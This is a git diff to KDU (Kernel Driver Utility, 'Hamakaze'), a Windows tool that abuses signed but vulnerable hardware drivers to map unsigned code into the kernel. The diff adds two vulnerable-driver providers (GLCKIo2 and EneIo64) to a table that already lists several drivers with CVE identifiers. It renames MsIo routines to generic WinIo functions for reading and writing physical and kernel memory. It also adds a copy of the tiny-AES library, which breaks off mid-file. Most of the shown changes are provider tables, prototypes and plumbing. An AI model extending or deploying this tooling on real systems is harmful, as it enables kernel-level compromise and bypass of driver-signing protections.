+#define SWAP_UINT32(x) (((x) >> 24) | (((x) & 0x00FF0000) >> 8) | (((x) & 0x0000FF00) << 8) | ((x) << 24))
-#define IOCTL_MSIO_UNMAP_USER_PHYSICAL_MEMORY \
- CTL_CODE(MICSYS_DEVICE_TYPE, MSIO_UNMAP_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80102044
/*
-Structure definition note
+MsIo64 Structure definition note
Field BusAddress downcasted to ULONG in driver
@@ -54,35 +69,52 @@ typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_MSIO_PHYSICAL_MEMORY_
} MSIO_PHYSICAL_MEMORY_INFO, * PMSIO_PHYSICAL_MEMORY_INFO;
#pragma warning(pop)
-BOOL WINAPI MsioQueryPML4Value(
+/*
+
+This is original WinIo structure layout.
+
+*/
+typedef struct _WINIO_PHYSICAL_MEMORY_INFO {
+ ULONG_PTR ViewSize;
+ ULONG_PTR BusAddress; //physical address
+ HANDLE SectionHandle;
+ PVOID BaseAddress;
+ PVOID ReferencedObject;
+} WINIO_PHYSICAL_MEMORY_INFO, * PWINIO_PHYSICAL_MEMORYINFO;
+
+BOOL WINAPI WinIoQueryPML4Value(
_In_ HANDLE DeviceHandle,
_Out_ ULONG_PTR* Value);
-BOOL WINAPI MsioReadPhysicalMemory(
+BOOL WINAPI WinIoReadPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
_In_ ULONG NumberOfBytes);
-BOOL WINAPI MsioWritePhysicalMemory(
+BOOL WINAPI WinIoWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
-BOOL WINAPI MsioVirtualToPhysical(
+BOOL WINAPI WinIoVirtualToPhysical(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
_Out_ ULONG_PTR* PhysicalAddress);
-BOOL WINAPI MsioReadKernelVirtualMemory(
+BOOL WINAPI WinIoReadKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
-BOOL WINAPI MsioWriteKernelVirtualMemory(
+BOOL WINAPI WinIoWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI WinIoRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 0e5d0e8..ea8d831 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 09 Feb 2020
+* DATE: 12 Feb 2020
*
* Vulnerable driver providers routines.
*
@@ -22,7 +22,7 @@
#include "idrv/rtcore.h"
#include "idrv/gdrv.h"
#include "idrv/atszio.h"
-#include "idrv/msio.h"
+#include "idrv/winio.h"
//
// Since we have a lot of them, make an abstraction layer.
@@ -33,7 +33,7 @@ KDU_PROVIDER g_KDUProviders[KDU_PROVIDERS_MAX] =
{
KDU_MAX_NTBUILDNUMBER,
IDR_iQVM64,
- 0x00000000,
+ KDUPROV_FLAGS_NONE,
(LPWSTR)L"CVE-2015-2291",
(LPWSTR)L"NalDrv",
(LPWSTR)L"Nal",
@@ -54,7 +54,7 @@ KDU_PROVIDER g_KDUProviders[KDU_PROVIDERS_MAX] =
{
KDU_MAX_NTBUILDNUMBER,
IDR_RTCORE64,
- 0x00000000,
+ KDUPROV_FLAGS_NONE,
(LPWSTR)L"CVE-2019-16098",
(LPWSTR)L"RTCore64",
(LPWSTR)L"RTCore64",
@@ -75,7 +75,7 @@ KDU_PROVIDER g_KDUProviders[KDU_PROVIDERS_MAX] =
{
KDU_MAX_NTBUILDNUMBER,
IDR_GDRV,
- 0x00000000,
+ KDUPROV_FLAGS_NONE,
(LPWSTR)L"CVE-2018-19320",
(LPWSTR)L"Gdrv",
(LPWSTR)L"GIO",
@@ -96,7 +96,7 @@ KDU_PROVIDER g_KDUProviders[KDU_PROVIDERS_MAX] =
{
KDU_MAX_NTBUILDNUMBER,
IDR_ATSZIO64,
- 0x00000000,
+ KDUPROV_FLAGS_NONE,
(LPWSTR)L"ASUSTeK WinFlash",
(LPWSTR)L"ATSZIO",
(LPWSTR)L"ATSZIO",
@@ -117,24 +117,65 @@ KDU_PROVIDER g_KDUProviders[KDU_PROVIDERS_MAX] =
{
KDU_MAX_NTBUILDNUMBER,
IDR_MSIO64,
- 0x00000002,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_WINIO_BASED,
(LPWSTR)L"CVE-2019-18845",
(LPWSTR)L"MsIo64",
(LPWSTR)L"MsIo",
(LPWSTR)L"MICSYS Technology Co., Ltd.",
- (provRegisterDriver)KDUProviderStub,
+ WinIoRegisterDriver,
(provUnregisterDriver)KDUProviderStub,
(provAllocateKernelVM)KDUProviderStub,
(provFreeKernelVM)KDUProviderStub,
- MsioReadKernelVirtualMemory,
- MsioWriteKernelVirtualMemory,
- MsioVirtualToPhysical,
+ WinIoReadKernelVirtualMemory,
+ WinIoWriteKernelVirtualMemory,
+ WinIoVirtualToPhysical,
(provReadControlRegister)KDUProviderStub,
- MsioQueryPML4Value,
- MsioReadPhysicalMemory,
- MsioWritePhysicalMemory
- }
+ WinIoQueryPML4Value,
+ WinIoReadPhysicalMemory,
+ WinIoWritePhysicalMemory
+ },
+
+ {
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_GLCKIO2,
+ KDUPROV_FLAGS_WINIO_BASED,
+ (LPWSTR)L"ASRock Polychrome RGB, multiple CVE ids",
+ (LPWSTR)L"GLCKIo2",
+ (LPWSTR)L"GLCKIo2",
+ (LPWSTR)L"ASUSTeK Computer Inc.",
+ WinIoRegisterDriver,
+ (provUnregisterDriver)KDUProviderStub,
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ WinIoReadKernelVirtualMemory,
+ WinIoWriteKernelVirtualMemory,
+ WinIoVirtualToPhysical,
+ (provReadControlRegister)KDUProviderStub,
+ WinIoQueryPML4Value,
+ WinIoReadPhysicalMemory,
+ WinIoWritePhysicalMemory
+ },
+ {
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_ENEIO64,
+ KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_WINIO_BASED,
+ (LPWSTR)L"G.SKILL Trident Z Lighting Control",
+ (LPWSTR)L"EneIo64",
+ (LPWSTR)L"EneIo",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ WinIoRegisterDriver,
+ (provUnregisterDriver)KDUProviderStub,
+ (provAllocateKernelVM)KDUProviderStub,
+ (provFreeKernelVM)KDUProviderStub,
+ WinIoReadKernelVirtualMemory,
+ WinIoWriteKernelVirtualMemory,
+ WinIoVirtualToPhysical,
+ (provReadControlRegister)KDUProviderStub,
+ WinIoQueryPML4Value,
+ WinIoReadPhysicalMemory,
+ WinIoWritePhysicalMemory
+ }
};
/*
@@ -170,9 +211,11 @@ VOID KDUProvList()
// List provider flags.
//
printf_s("\tHVCI support: %s\r\n"\
- "\tWHQL signature present: %s\r\n",
+ "\tWHQL signature present: %s\r\n"\
+ "\tWinIO based: %s\r\n",
(prov->SupportHVCI == 0) ? "No" : "Yes",
- (prov->SignatureWHQL == 0) ? "No" : "Yes");
+ (prov->SignatureWHQL == 0) ? "No" : "Yes",
+ (prov->WinIoBased == 0) ? "No" : "Yes");
//
// Maximum support Windows build.
@@ -458,7 +501,7 @@ PKDU_CONTEXT WINAPI KDUProviderCreate(
// Show provider info.
//
printf_s("[>] Entering %s\r\n", __FUNCTION__);
- printf_s("[+] Provider: Desciption %ws, Name \"%ws\"\r\n",
+ printf_s("[+] Provider: %ws, Name \"%ws\"\r\n",
prov->Desciption,
prov->DriverName);
@@ -517,12 +560,12 @@ PKDU_CONTEXT WINAPI KDUProviderCreate(
return NULL;
#endif
- }
+ }
break;
default:
break;
-}
+ }
NTSTATUS ntStatus;
@@ -589,8 +632,11 @@ PKDU_CONTEXT WINAPI KDUProviderCreate(
//
if ((PVOID)Context->Provider->Callbacks.RegisterDriver != (PVOID)KDUProviderStub) {
- if (!Context->Provider->Callbacks.RegisterDriver(deviceHandle))
- printf_s("[!] Coult not register driver, GetLastError %lu\r\n", GetLastError());
+ if (!Context->Provider->Callbacks.RegisterDriver(deviceHandle,
+ UlongToPtr(Context->Provider->ResourceId)))
+ {
+ printf_s("[!] Could not register driver, GetLastError %lu\r\n", GetLastError());
+ }
}
}
@@ -624,7 +670,7 @@ VOID WINAPI KDUProviderRelease(
// Unregister driver if supported.
//
if ((PVOID)Context->Provider->Callbacks.UnregisterDriver != (PVOID)KDUProviderStub) {
- Context->Provider->Callbacks.UnregisterDriver(Context->DeviceHandle);
+ Context->Provider->Callbacks.UnregisterDriver(Context->DeviceHandle, NULL);
}
if (Context->DeviceHandle)
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 5b20017..a2b420a 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -4,9 +4,9 @@
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 09 Feb 2020
+* DATE: 12 Feb 2020
*
* Provider support routines.
*
@@ -19,13 +19,15 @@
#pragma once
-#define KDU_PROVIDERS_MAX 5
+#define KDU_PROVIDERS_MAX 7
#define KDU_PROVIDER_INTEL_NAL 0
#define KDU_PROVIDER_UNWINDER_RTCORE 1
#define KDU_PROVIDER_GIGABYTE_GDRV 2
#define KDU_PROVIDER_ASUSTEK_ATSZIO 3
#define KDU_PROVIDER_PATRIOT_MSIO64 4
+#define KDU_PROVIDER_GLCKIO2 5
+#define KDU_PROVIDER_ENEIO64 6
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
@@ -113,13 +115,15 @@ typedef BOOL(WINAPI* provQueryPML4)(
// Prototype for driver registering/unlocking function.
//
typedef BOOL(WINAPI* provRegisterDriver)(
- _In_ HANDLE DeviceHandle);
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
//
// Prototype for driver unregistering function.
//
typedef BOOL(WINAPI* provUnregisterDriver)(
- _In_ HANDLE DeviceHandle);
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
typedef enum _KDU_ACTION_TYPE {
ActionTypeMapDriver = 0,
@@ -129,6 +133,12 @@ typedef enum _KDU_ACTION_TYPE {
ActionTypeMax
} KDU_ACTION_TYPE;
+#define KDUPROV_FLAGS_NONE 0x00000000
+#define KDUPROV_FLAGS_SUPPORT_HVCI 0x00000001
+#define KDUPROV_FLAGS_SIGNATURE_WHQL 0x00000002
+#define KDUPROV_FLAGS_WINIO_BASED 0x00000004
+#define KDUPROV_FLAGS_WINRING0_BASED 0x00000008
+
typedef struct _KDU_PROVIDER {
ULONG MaxNtBuildNumberSupport;
ULONG ResourceId;
@@ -137,7 +147,9 @@ typedef struct _KDU_PROVIDER {
struct {
ULONG SupportHVCI : 1;
ULONG SignatureWHQL : 1;
- ULONG Reserved : 30;
+ ULONG WinIoBased : 1;
+ ULONG WinRing0Based : 1;
+ ULONG Reserved : 28;
};
};
LPWSTR Desciption;
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index c4ad5b0..3854d62 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -4,9 +4,9 @@
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 02 Feb 2020
+* DATE: 12 Feb 2020
*
* Hamakaze main logic and entrypoint.
*
@@ -44,7 +44,7 @@ volatile LONG g_lApplicationInstances = 0;
"kdu -map filename - map driver to the kernel and execute it entry point\r\n"\
"kdu -list - list available providers\r\n"
-#define T_KDUINTRO "[+] Kernel Driver Utility v1.0.0 started, (c) 2020 KDU Project\r\n[+] Supported x64 OS: Windows 7 and above"
+#define T_KDUINTRO "[+] Kernel Driver Utility v1.0.1 started, (c) 2020 KDU Project\r\n[+] Supported x64 OS: Windows 7 and above"
#define T_PRNTDEFAULT "%s\r\n"
/*
diff --git a/Source/Hamakaze/resource.h b/Source/Hamakaze/resource.h
index ff5365d..f01d9d0 100644
--- a/Source/Hamakaze/resource.h
+++ b/Source/Hamakaze/resource.h
@@ -8,13 +8,15 @@
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
#define IDR_MSIO64 108
+#define IDR_GLCKIO2 109
+#define IDR_ENEIO64 110
#define IDI_ICON1 1001
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 109
+#define _APS_NEXT_RESOURCE_VALUE 111
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index ff7ffd2..7cc7666 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,0,0,2002
- PRODUCTVERSION 1,0,0,2002
+ FILEVERSION 1,0,1,2002
+ PRODUCTVERSION 1,0,1,2002
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.0.0.2002"
+ VALUE "FileVersion", "1.0.1.2002"
VALUE "InternalName", "Hamakaze.exe"
VALUE "LegalCopyright", "Copyright (C) 2020 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.0.0.2002"
+ VALUE "ProductVersion", "1.0.1.2002"
END
END
BLOCK "VarFileInfo"
@@ -101,6 +101,10 @@ IDR_ATSZIO64 RCDATA "drv\\ATSZIO64.bin"
IDR_MSIO64 RCDATA "drv\\msio64.bin"
+IDR_GLCKIO2 RCDATA "drv\\glckio2.bin"
+
+IDR_ENEIO64 RCDATA "drv\\eneio64.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
diff --git a/Source/Hamakaze/tests.cpp b/Source/Hamakaze/tests.cpp
index 4ecc906..d9f3b75 100644
--- a/Source/Hamakaze/tests.cpp
+++ b/Source/Hamakaze/tests.cpp
@@ -24,7 +24,7 @@ VOID KDUTest()
PKDU_CONTEXT Context;
ULONG_PTR objectAddress = 0, value = 0;
- Context = KDUProviderCreate(4, FALSE, 17763, GetModuleHandle(NULL), ActionTypeMapDriver);
+ Context = KDUProviderCreate(5, FALSE, 17763, GetModuleHandle(NULL), ActionTypeMapDriver);
if (Context) {
if (supQueryObjectFromHandle(Context->DeviceHandle, &objectAddress)) {
@@ -34,7 +34,7 @@ VOID KDUTest()
RtlSecureZeroMemory(&fileObject, sizeof(FILE_OBJECT));
- objectAddress = 0xfffff800e5566d18;
+ objectAddress = 0xfffff8087fe36d18;
KDUReadKernelVM(Context,
objectAddress,
diff --git a/Source/Hamakaze/tinyaes/aes.c b/Source/Hamakaze/tinyaes/aes.c
new file mode 100644
index 0000000..b62d0bb
--- /dev/null
+++ b/Source/Hamakaze/tinyaes/aes.c
@@ -0,0 +1,571 @@
+/*
+
+This is an implementation of the AES algorithm, specifically ECB, CTR and CBC mode.
+Block size can be chosen in aes.h - available choices are AES128, AES192, AES256.
+
+The implementation is verified against the test vectors in:
+ National Institute of Standards and Technology Special Publication 800-38A 2001 ED
+
+ECB-AES128
+----------
+
+ plain-text:
+ 6bc1bee22e409f96e93d7e117393172a
+ ae2d8a571e03ac9c9eb76fac45af8e51
+ 30c81c46a35ce411e5fbc1191a0a52ef
+ f69f2445df4f9b17ad2b417be66c3710
+
+ key:
+ 2b7e151628aed2a6abf7158809cf4f3c
+
+ resulting cipher
+ 3ad77bb40d7a3660a89ecaf32466ef97
+ f5d3d58503b9699de785895a96fdbaaf
+ 43b1cd7f598ece23881b00e3ed030688
+ 7b0c785e27e8ad3f8223207104725dd4
+
+
+NOTE: String length must be evenly divisible by 16byte (str_len % 16 == 0)
+ You should pad the end of the string with zeros if this is not the case.
+ For AES192/256 the key size is proportionally larger.
+
+*/
+
+
+/*****************************************************************************/
+/* Includes: */
+/*****************************************************************************/
+#include // CBC mode, for memset
+#include "aes.h"
+
+/*****************************************************************************/
+/* Defines: */
+/*****************************************************************************/
+// The number of columns comprising a state in AES. This is a constant in AES. Value=4
+#define Nb 4
+
+#if defined(AES256) && (AES256 == 1)
+ #define Nk 8
+ #define Nr 14
+#elif defined(AES192) && (AES192 == 1)
+ #define Nk 6
+ #define Nr 12
+#else
+ #define Nk 4 // The number of 32 bit words in a key.
+ #define Nr 10 // The number of rounds in AES Cipher.
+#endif
+
+// jcallan@github points out that declaring Multiply as a function
+// reduces code size considerably with the Keil ARM compiler.
+// See this link for more information: https://github.com/kokke/tiny-AES-C/pull/3
+#ifndef MULTIPLY_AS_A_FUNCTION
+ #define MULTIPLY_AS_A_FUNCTION 0
+#endif
+
+
+
+
+/*****************************************************************************/
+/* Private variables: */
+/*****************************************************************************/
+// state - array holding the intermediate results during decryption.
+typedef uint8_t state_t[4][4];
+
+
+
+// The lookup-tables are marked const so they can be placed in read-only storage instead of RAM
+// The numbers below can be computed dynamically trading ROM for RAM -
+// This can be useful in (embedded) bootloader applications, where ROM is often limited.
+static const uint8_t sbox[256] = {
+ //0 1 2 3 4 5 6 7 8 9 A B C D E F
+ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
+ 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
+ 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
+ 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
+ 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
+ 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
+ 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
+ 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
+ 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
+ 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
+ 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
+ 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
+ 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
+ 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
+ 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
+ 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 };
+
+static const uint8_t rsbox[256] = {
+ 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
+ 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
+ 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
+ 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
+ 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
+ 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
+ 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
+ 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
+ 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
+ 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
+ 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
+ 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
+ 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
+ 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
+ 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
+ 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d };
+
+// The round constant word array, Rcon[i], contains the values given by
+// x to the power (i-1) being powers of x (x is denoted as {02}) in the field GF(2^8)
+static const uint8_t Rcon[11] = {
+ 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36 };
+
+/*
+ * Jordan Goulder points out in PR #12 (https://github.com/kokke/tiny-AES-C/pull/12),
+ * that you can remove most of the elements in the Rcon array, because they are unused.
+ *
+ * From Wikipedia's article on the Rijndael key schedule @ https://en.wikipedia.org/wiki/Rijndael_key_schedule#Rcon
+ *
+ * "Only the first some of these constants are actually used – up to rcon[10] for AES-128 (as 11 round keys are needed),
+ * up to rcon[8] for AES-192, up to rcon[7] for AES-256. rcon[0] is not used in AES algorithm."
+ */
+
+
+/*****************************************************************************/
+/* Private functions: */
+/*****************************************************************************/
+/*
+static uint8_t getSBoxValue(uint8_t num)
+{
+ return sbox[num];
+}
+*/
+#define getSBoxValue(num) (sbox[(num)])
+/*
+static uint8_t getSBoxInvert(uint8_t num)
+{
+ return rsbox[num];
+}
+*/
+#define getSBoxInvert(num) (rsbox[(num)])
+
+// This function produces Nb(Nr+1) round keys. The round keys are used in each round to decrypt the states.
+static void KeyExpansion(uint8_t* RoundKey, const uint8_t* Key)
+{
+ unsigned i, j, k;
+ uint8_t tempa[4]; // Used for the column/row operations
+
+ // The first round key is the key itself.
+ for (i = 0; i < Nk; ++i)
+ {
+ RoundKey[(i * 4) + 0] = Key[(i * 4) + 0];
+ RoundKey[(i * 4) + 1] = Key[(i * 4) + 1];
+ RoundKey[(i * 4) + 2] = Key[(i * 4) + 2];
+ RoundKey[(i * 4) + 3] = Key[(i * 4) + 3];
+ }
+
+ // All other round keys are found from the previous round keys.
+ for (i = Nk; i < Nb * (Nr + 1); ++i)
+ {
+ {
+ k = (i - 1) * 4;
+ tempa[0]=RoundKey[k + 0];
+ tempa[1]=RoundKey[k + 1];
+ tempa[2]=RoundKey[k + 2];
+ tempa[3]=RoundKey[k + 3];
+
+ }
+
+ if (i % Nk == 0)
+ {
+ // This function shifts the 4 bytes in a word to the left once.
+ // [a0,a1,a2,a3] becomes [a1,a2,a3,a0]
+
+ // Function RotWord()
+ {
+ const uint8_t u8tmp = tempa[0];
+ tempa[0] = tempa[1];
+ tempa[1] = tempa[2];
+ tempa[2] = tempa[3];
+ tempa[3] = u8tmp;
+ }
+
+ // SubWord() is a function that takes a four-byte input word and
+ // applies the S-box to each of the four bytes to produce an output word.
+
+ // Function Subword()
+ {
+ tempa[0] = getSBoxValue(tempa[0]);
+ tempa[1] = getSBoxValue(tempa[1]);
+ tempa[2] = getSBoxValue(tempa[2]);
+ tempa[3] = getSBoxValue(tempa[3]);
+ }
+
+ tempa[0] = tempa[0] ^ Rcon[i/Nk];
+ }
+#if defined(AES256) && (AES256 == 1)
+ if (i % Nk == 4)
+ {
+ // Function Subword()
+ {
+ tempa[0] = getSBoxValue(tempa[0]);
+ tempa[1] = getSBoxValue(tempa[1]);
+ tempa[2] = getSBoxValue(tempa[2]);
+ tempa[3] = getSBoxValue(tempa[3]);
+ }
+ }
+#endif
+ j = i * 4; k=(i - Nk) * 4;
+ RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0];
+ RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1];
+ RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2];
+ RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3];
+ }
+}
+
+void AES_init_ctx(struct AES_ctx* ctx, const uint8_t* key)
+{
+ KeyExpansion(ctx->RoundKey, key);
+}
+#if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1))
+void AES_init_ctx_iv(struct AES_ctx* ctx, const uint8_t* key, const uint8_t* iv)
+{
+ KeyExpansion(ctx->RoundKey, key);
+ memcpy (ctx->Iv, iv, AES_BLOCKLEN);
+}
+void AES_ctx_set_iv(struct AES_ctx* ctx, const uint8_t* iv)
+{
+ memcpy (ctx->Iv, iv, AES_BLOCKLEN);
+}
+#endif
+
+// This function adds the round key to state.
+// The round key is added to the state by an XOR function.
+static void AddRoundKey(uint8_t round, state_t* state, const uint8_t* RoundKey)
+{
+ uint8_t i,j;
+ for (i = 0; i < 4; ++i)
+ {
+ for (j = 0; j < 4; ++j)
+ {
+ (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j];
+ }
+ }
+}
+
+// The SubBytes Function Substitutes the values in the
+// state matrix with values in an S-box.
+static void SubBytes(state_t* state)
+{
+ uint8_t i, j;
+ for (i = 0; i < 4; ++i)
+ {
+ for (j = 0; j < 4; ++j)
+ {
+ (*state)[j][i] = getSBoxValue((*state)[j][i]);
+ }
+ }
+}
+
+// The ShiftRows() function shifts the rows in the state to the left.
+// Each row is shifted with different offset.
+// Offset = Row number. So the first row is not shifted.
+static void ShiftRows(state_t* state)
+{
+ uint8_t temp;
+
+ // Rotate first row 1 columns to left
+ temp = (*state)[0][1];
+ (*state)[0][1] = (*state)[1][1];
+ (*state)[1][1] = (*state)[2][1];
+ (*state)[2][1] = (*state)[3][1];
+ (*state)[3][1] = temp;
+
+ // Rotate second row 2 columns to left
+ temp = (*state)[0][2];
+ (*state)[0][2] = (*state)[2][2];
+ (*state)[2][2] = temp;
+
+ temp = (*state)[1][2];
+ (*state)[1][2] = (*state)[3][2];
+ (*state)[3][2] = temp;
+
+ // Rotate third row 3 columns to left
+ temp = (*state)[0][3];
+ (*state)[0][3] = (*state)[3][3];
+ (*state)[3][3] = (*state)[2][3];
+ (*state)[2][3] = (*state)[1][3];
+ (*state)[1][3] = temp;
+}
+
+static uint8_t xtime(uint8_t x)
+{
